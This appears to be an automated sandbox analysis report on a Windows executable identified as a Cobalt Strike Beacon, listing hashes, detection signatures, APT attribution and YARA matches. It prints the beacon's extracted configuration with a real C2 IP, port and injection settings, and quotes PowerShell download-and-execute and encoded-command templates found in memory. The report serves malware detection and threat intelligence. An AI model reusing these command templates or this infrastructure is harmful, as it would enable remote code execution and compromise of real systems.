Edit tour

Windows Analysis Report
P3KxDOMmD3.exe

Overview

General Information

Sample name:	P3KxDOMmD3.exe renamed because original name is a hash value
Original sample name:	b079e06ca60cf07b35abd19e225d3e1c.exe
Analysis ID:	1528400
MD5:	b079e06ca60cf07b35abd19e225d3e1c
SHA1:	9f707057f162e7b6b6a51fd0b8ad1f155ae6438b
SHA256:	a430979a8135771d0a0ffce9ef6755052ae788dec08e9a095d5e63f9b6f387f6
Tags:	64exe
Infos:

Detection

CobaltStrike

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (creates a PE file in dynamic memory)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected CobaltStrike

Yara detected Powershell download and execute

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to detect sleep reduction / modifications

Found API chain indicative of debugger detection

Found potential dummy code loops (likely to delay analysis)

Machine Learning detection for sample

Uses known network protocols on non-standard ports

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

P3KxDOMmD3.exe (PID: 5480 cmdline: "C:\Users\user\Desktop\P3KxDOMmD3.exe" MD5: B079E06CA60CF07B35ABD19E225D3E1C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Cobalt Strike, CobaltStrike	Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.	APT 29 APT32 APT41 AQUATIC PANDA Anunak Cobalt Codoso CopyKittens DarkHydrus Earth Baxia FIN6 FIN7 Leviathan Mustang Panda Shell Crew Stone Panda TianWu UNC1878 UNC2452 Winnti Umbrella	http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems http://blog.nsfocus.net/murenshark http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa http://www.secureworks.com/research/threat-profiles/gold-drake	https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTP"], "Port": 7810, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "89.197.154.116,/cm", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x32d6a:$a11: Could not open service control manager on %s: %d 0x3329c:$a12: %d is an x64 process (can't inject x86 content) 0x332cc:$a13: %d is an x86 process (can't inject x64 content) 0x335ed:$a14: Failed to impersonate logged on user %d (%u) 0x33255:$a15: could not create remote thread in %d: %d 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x33203:$a17: could not write to process memory: %d 0x32d9b:$a18: Could not create service %s on %s: %d 0x32e24:$a19: Could not delete service %s on %s: %d 0x32c89:$a20: Could not open process token: %d (%u)
00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x334b2:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x334fc:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x332cc:$x3: %d is an x86 process (can't inject x64 content) 0x32c89:$s1: Could not open process token: %d (%u) 0x329a3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32d47:$s4: Could not connect to pipe (%s): %d
00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x41bf1:$loader_export: ReflectiveLoader 0x32960:$exportname: beacon.dll
00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x3329c:$x2: %d is an x64 process (can't inject x86 content) 0x335ed:$x3: Failed to impersonate logged on user %d (%u) 0x334fc:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x334b2:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x32c0f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x33203:$s4: could not write to process memory: %d 0x329a3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32d47:$s6: Could not connect to pipe (%s): %d
00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x33970:$str1: %s (admin) 0x32960:$str2: beacon.dll
00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x334fc:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x332cc:$x2: %d is an x86 process (can't inject x64 content) 0x334b2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x33596:$x4: Failed to impersonate token from %d (%u) 0x335ed:$x5: Failed to impersonate logged on user %d (%u) 0x329a3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x3348a:$s1: %%IMPORT%% 0x32987:$s2: www6.%x%x.%s 0x3297b:$s3: cdn.%x%x.%s 0x32c03:$s4: api.%x%x.%s 0x33970:$s5: %s (admin) 0x32c72:$s6: could not spawn %s: %d 0x3352e:$s7: Could not kill %d: %d 0x32d47:$s8: Could not connect to pipe (%s): %d 0x32994:$s9: %s.1%x.%x%x.%s 0x329a3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a1b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a7e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32ac4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b02:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x32b38:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b61:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b86:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x32ba7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x32bc4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x32bdd:$s9: %s.1%08x%08x.%x%x.%s 0x32bf2:$s9: %s.1%08x.%x%x.%s
00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_4	Yara detected CobaltStrike	Joe Security
00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x30fa3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3101b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31780:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x31ab2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31a44:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x31ab2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x3107e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3120f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x310c4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31102:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31afc:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x3136a:$a11: Could not open service control manager on %s: %d 0x3189c:$a12: %d is an x64 process (can't inject x86 content) 0x318cc:$a13: %d is an x86 process (can't inject x64 content) 0x31bed:$a14: Failed to impersonate logged on user %d (%u) 0x31855:$a15: could not create remote thread in %d: %d 0x31138:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31803:$a17: could not write to process memory: %d 0x3139b:$a18: Could not create service %s on %s: %d 0x31424:$a19: Could not delete service %s on %s: %d 0x31289:$a20: Could not open process token: %d (%u)
00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1cd3c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1896a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x19c9b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x31ab2:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31afc:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x318cc:$x3: %d is an x86 process (can't inject x64 content) 0x31289:$s1: Could not open process token: %d (%u) 0x30fa3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31347:$s4: Could not connect to pipe (%s): %d
00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x401f1:$loader_export: ReflectiveLoader 0x30f60:$exportname: beacon.dll
00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x3189c:$x2: %d is an x64 process (can't inject x86 content) 0x31bed:$x3: Failed to impersonate logged on user %d (%u) 0x31afc:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x31ab2:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x3120f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x31803:$s4: could not write to process memory: %d 0x30fa3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31347:$s6: Could not connect to pipe (%s): %d
00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x31f70:$str1: %s (admin) 0x30f60:$str2: beacon.dll
00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x31afc:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x318cc:$x2: %d is an x86 process (can't inject x64 content) 0x31ab2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31b96:$x4: Failed to impersonate token from %d (%u) 0x31bed:$x5: Failed to impersonate logged on user %d (%u) 0x30fa3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen
00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x31a8a:$s1: %%IMPORT%% 0x30f87:$s2: www6.%x%x.%s 0x30f7b:$s3: cdn.%x%x.%s 0x31203:$s4: api.%x%x.%s 0x31f70:$s5: %s (admin) 0x31272:$s6: could not spawn %s: %d 0x31b2e:$s7: Could not kill %d: %d 0x31347:$s8: Could not connect to pipe (%s): %d 0x30f94:$s9: %s.1%x.%x%x.%s 0x30fa3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3101b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3107e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x310c4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31102:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31138:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31161:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31186:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x311a7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x311c4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x311dd:$s9: %s.1%08x%08x.%x%x.%s 0x311f2:$s9: %s.1%08x.%x%x.%s
Process Memory Space: P3KxDOMmD3.exe PID: 5480	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
Process Memory Space: P3KxDOMmD3.exe PID: 5480	JoeSecurity_CobaltStrike_1	Yara detected CobaltStrike	Joe Security
Process Memory Space: P3KxDOMmD3.exe PID: 5480	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: P3KxDOMmD3.exe PID: 5480	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
Process Memory Space: P3KxDOMmD3.exe PID: 5480	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
Process Memory Space: P3KxDOMmD3.exe PID: 5480	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x1893c:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x488fa:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x189b4:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x48972:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x19119:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x490d7:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x19441:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x493ff:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x193d3:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x19441:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x49391:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x493ff:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x18a17:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x489d5:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x18ba8:$a7: could not run command (w/ token) because of its length of %d bytes! 0x48b66:$a7: could not run command (w/ token) because of its length of %d bytes! 0x18a5d:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x48a1b:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x18a9b:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x48a59:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x1948b:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
Process Memory Space: P3KxDOMmD3.exe PID: 5480	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x1dc27:$loader_export: ReflectiveLoader 0x1dc46:$loader_export: ReflectiveLoader 0x4da38:$loader_export: ReflectiveLoader 0x4da57:$loader_export: ReflectiveLoader 0x18777:$exportname: beacon.dll 0x18902:$exportname: beacon.dll 0x48737:$exportname: beacon.dll 0x488c0:$exportname: beacon.dll
Process Memory Space: P3KxDOMmD3.exe PID: 5480	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x1948b:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x49449:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x19265:$x2: %d is an x86 process (can't inject x64 content) 0x49223:$x2: %d is an x86 process (can't inject x64 content) 0x19441:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x493ff:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x19525:$x4: Failed to impersonate token from %d (%u) 0x494e3:$x4: Failed to impersonate token from %d (%u) 0x1957c:$x5: Failed to impersonate logged on user %d (%u) 0x4953a:$x5: Failed to impersonate logged on user %d (%u) 0x1893c:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x488fa:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.P3KxDOMmD3.exe.1a0000.0.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.P3KxDOMmD3.exe.1a0000.0.unpack	JoeSecurity_CobaltStrike_4	Yara detected CobaltStrike	Joe Security
0.2.P3KxDOMmD3.exe.1a0000.0.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.P3KxDOMmD3.exe.1a0000.0.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x303a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3041b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3047e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x304c4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30502:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x30538:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30160:$a39: %s as %s\%s: %d 0x30394:$a40: %s.1%x.%x%x.%s 0x3e7e2:$a41: beacon.x64.dll 0x30387:$a43: www6.%x%x.%s 0x3037b:$a44: cdn.%x%x.%s 0x30360:$a47: beacon.dll 0x302d8:$a48: %s%s: %s 0x3018c:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x301b8:$a50: %02d/%02d/%02d %02d:%02d:%02d
0.2.P3KxDOMmD3.exe.1a0000.0.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1c13c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.P3KxDOMmD3.exe.1a0000.0.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x17d6a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1909b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
0.2.P3KxDOMmD3.exe.1a0000.0.unpack	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x3e7f1:$loader_export: ReflectiveLoader 0x30360:$exportname: beacon.dll
0.2.P3KxDOMmD3.exe.1a0000.0.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x303a3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
0.2.P3KxDOMmD3.exe.660000.2.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.P3KxDOMmD3.exe.660000.2.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
